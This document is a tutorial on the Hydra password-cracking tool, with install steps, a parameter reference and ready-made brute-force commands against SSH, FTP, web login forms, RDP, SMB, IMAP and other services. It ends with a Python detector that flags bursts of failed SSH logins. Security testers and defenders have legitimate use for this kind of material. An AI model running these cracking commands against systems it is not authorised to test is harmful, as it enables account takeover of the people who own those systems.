Hydra
Hydra is a powerful brute-force password cracking tool that supports online password cracking for almost all protocols. Whether a password can be cracked depends on whether the dictionary is strong enough; combining the dictionary with information gathered through social engineering can sometimes achieve twice the result with half the effort. This article only discusses testing from a security perspective.
1. Introduction
Hydra is an open-source brute-force password cracking tool from the well-known hacker group THC, which can crack many kinds of passwords online. Official website: http://www.thc.org/thc-hydra. It supports AFP, Cisco AAA, Cisco auth, Cisco enable, CVS, Firebird, FTP, HTTP-FORM-GET, HTTP-FORM-POST, HTTP-GET, HTTP-HEAD, HTTP-PROXY, HTTPS-FORM-GET, HTTPS-FORM-POST, HTTPS-GET, HTTPS-HEAD, ICQ, IMAP, IRC, LDAP, MS-SQL, MYSQL, NCP, NNTP, Oracle Listener, Oracle SID, Oracle, PC-Anywhere, PCNFS, POP3, POSTGRES, RDP, Rexec, Rlogin, Rsh, SAP/R3, SIP, SMB, SMTP, SMTP Enum, SNMP, SOCKS5, SSH (v1 and v2), Subversion, Teamspeak (TS2), Telnet, VMware-Auth, VNC and XMPP.
2. Installation
Hydra Installation
# wget http://www.thc.org/releases/hydra-7.4.1.tar.gz
# tar zxvf hydra-7.4.1.tar.gz
# cd hydra-7.4.1
# ./configure
# make && make install
3. Explanation of parameters
hydra [[[-l LOGIN|-L FILE] [-p PASS|-P FILE]] | [-C FILE]] [-e ns]
[-o FILE] [-t TASKS] [-M FILE [-T TASKS]] [-w TIME] [-f] [-s PORT] [-S] [-vV] server service [OPT]
-R Resume cracking from the progress of the previous session.
-S Use an SSL connection.
-s PORT Specify a non-default port.
-l LOGIN Specify a single user name to crack.
-L FILE Specify a user name dictionary.
-p PASS Lowercase; specify a single password to try. Rarely used; a password dictionary is generally used instead.
-P FILE Uppercase; specify the password dictionary.
-e ns Additional checks. n: try an empty password; s: try the login name as the password.
-C FILE Use a file in colon-separated "login:password" format instead of the -L/-P parameters.
-M FILE Specify a target list file, one target per line.
-o FILE Specify the result output file.
-f When used with the -M parameter, abort cracking when the first login/password pair is found.
-t TASKS Number of threads running simultaneously; the default is 16.
-w TIME Set the maximum timeout in seconds; the default is 30s.
-v / -V Show detailed output.
server Target IP
service Specify the service name. Supported services and protocols: telnet ftp pop3[-ntlm] imap[-ntlm] smb smbnt
http-{head|get} http-{get|post}-form http-proxy cisco cisco-enable vnc
ldap2 ldap3 mssql mysql oracle-listener postgres nntp socks5 rexec
rlogin pcnfs snmp rsh cvs svn icq sapr3 ssh smtp-auth[-ntlm] pcanywhere
teamspeak sip vmauthd firebird ncp afp, etc.
OPT Optional, service-specific options
4. Examples of various uses
Simple demo: when the crack succeeds, the result is displayed directly. The red line shown above is the password that was cracked; it can also be written to a file with the -o parameter. If the dictionary is strong enough and is combined with social engineering, the password will not take long to come out.
1. Crack ssh:
hydra -l username -P password_dictionary -t threads -vV -e ns IP ssh
hydra -l username -P password_dictionary -t threads -o save.log -vV IP ssh
2. Crack ftp:
hydra IP ftp -l username -P password_dictionary -t threads (default 16) -vV
hydra IP ftp -l username -P password_dictionary -e ns -vV
3. Crack a web login submitted with GET:
hydra -l username -P password_dictionary -t threads -vV -e ns IP http-get /admin/
hydra -l username -P password_dictionary -t threads -vV -e ns -f IP http-get /admin/index.php
4. Crack a web login submitted with POST:
hydra -l username -P password_dictionary -s 80 IP http-post-form "/admin/login.php:username=^USER^&password=^PASS^&submit=login:sorry password"
hydra -t 3 -l admin -P pass.txt -o out.txt -f 10.36.16.18 http-post-form "login.php:id=^USER^&passwd=^PASS^:<title>wrong username or password</title>"
(Parameter description: -t sets the number of simultaneous threads to 3, -l sets the user name to admin, -P uses the dictionary pass.txt, -o saves the result to out.txt, -f stops when a password is cracked, 10.36.16.18 is the target IP, and http-post-form means the target is a form login submitted with HTTP POST. The <title> string is the message the page returns for an incorrect guess.)
5. Crack https:
hydra -m /index.php -l muts -P pass.txt 10.36.16.18 https
6. Crack teamspeak:
hydra -l username -P password_dictionary -s port -vV IP teamspeak
7. Crack cisco:
hydra -P pass.txt 10.36.16.18 cisco
hydra -m cloud -P pass.txt 10.36.16.18 cisco-enable
8. Crack smb:
hydra -l administrator -P pass.txt 10.36.16.18 smb
9. Crack pop3:
hydra -l muts -P pass.txt my.pop3.mail pop3
10. Crack rdp:
hydra IP rdp -l administrator -P pass.txt -V
11. Crack http-proxy:
hydra -l admin -P pass.txt http-proxy://10.36.16.18
12. Crack imap:
hydra -L user.txt -p secret 10.36.16.18 imap PLAIN
hydra -C defaults.txt -6 imap://[fe80::2c:31ff:fe12:ac11]:143/PLAIN
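Seen from the defending side, the online guessing described above (parallel attempts, 16 tasks by default, against one service) shows up as a burst of failed logins from a single source. The following is an added example, not part of the original article: it scans sshd log lines for such bursts and for a successful login that follows one. The log lines, threshold, window and function name are constructed assumptions.

```python
import re
from collections import defaultdict, deque
from datetime import datetime

# Constructed sshd log lines for illustration (documentation IP ranges).
SAMPLE_LOG = """\
Mar 10 10:00:01 host sshd[101]: Failed password for root from 203.0.113.5 port 40001 ssh2
Mar 10 10:00:01 host sshd[102]: Failed password for root from 203.0.113.5 port 40002 ssh2
Mar 10 10:00:02 host sshd[103]: Failed password for invalid user admin from 203.0.113.5 port 40003 ssh2
Mar 10 10:00:02 host sshd[104]: Failed password for root from 203.0.113.5 port 40004 ssh2
Mar 10 10:00:03 host sshd[105]: Failed password for root from 203.0.113.5 port 40005 ssh2
Mar 10 10:00:04 host sshd[106]: Accepted password for root from 203.0.113.5 port 40006 ssh2
Mar 10 10:05:00 host sshd[107]: Failed password for alice from 198.51.100.7 port 50001 ssh2
Mar 10 10:06:10 host sshd[108]: Accepted password for alice from 198.51.100.7 port 50002 ssh2
"""

LINE_RE = re.compile(
    r"^(\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(Failed|Accepted) password for (?:invalid user )?(\S+) from (\S+) port \d+")

def detect_bruteforce(log_text, threshold=5, window_s=10, year=2024):
    """Flag IPs with >= threshold failed logins inside window_s seconds (assumed
    tuning values; syslog omits the year, so one is supplied). Returns flagged IPs."""
    window = defaultdict(deque)  # ip -> failure timestamps inside the window
    stats = defaultdict(lambda: {"failures": 0, "users": set(),
                                 "flagged": False, "compromised": None})
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        ts = datetime.strptime(f"{year} {m.group(1)}", "%Y %b %d %H:%M:%S")
        outcome, user, ip = m.group(2), m.group(3), m.group(4)
        s = stats[ip]
        if outcome == "Failed":
            s["failures"] += 1
            s["users"].add(user)
            q = window[ip]
            q.append(ts)
            while (ts - q[0]).total_seconds() > window_s:
                q.popleft()  # drop failures older than the window
            if len(q) >= threshold:
                s["flagged"] = True
        elif s["flagged"]:
            # A success right after a guessing burst: treat as likely compromise.
            s["compromised"] = user
    return {ip: {k: v for k, v in s.items() if k != "flagged"}
            for ip, s in stats.items() if s["flagged"]}
```

Calling detect_bruteforce(SAMPLE_LOG) reports only 203.0.113.5; the single mistyped password from 198.51.100.7 stays below the threshold.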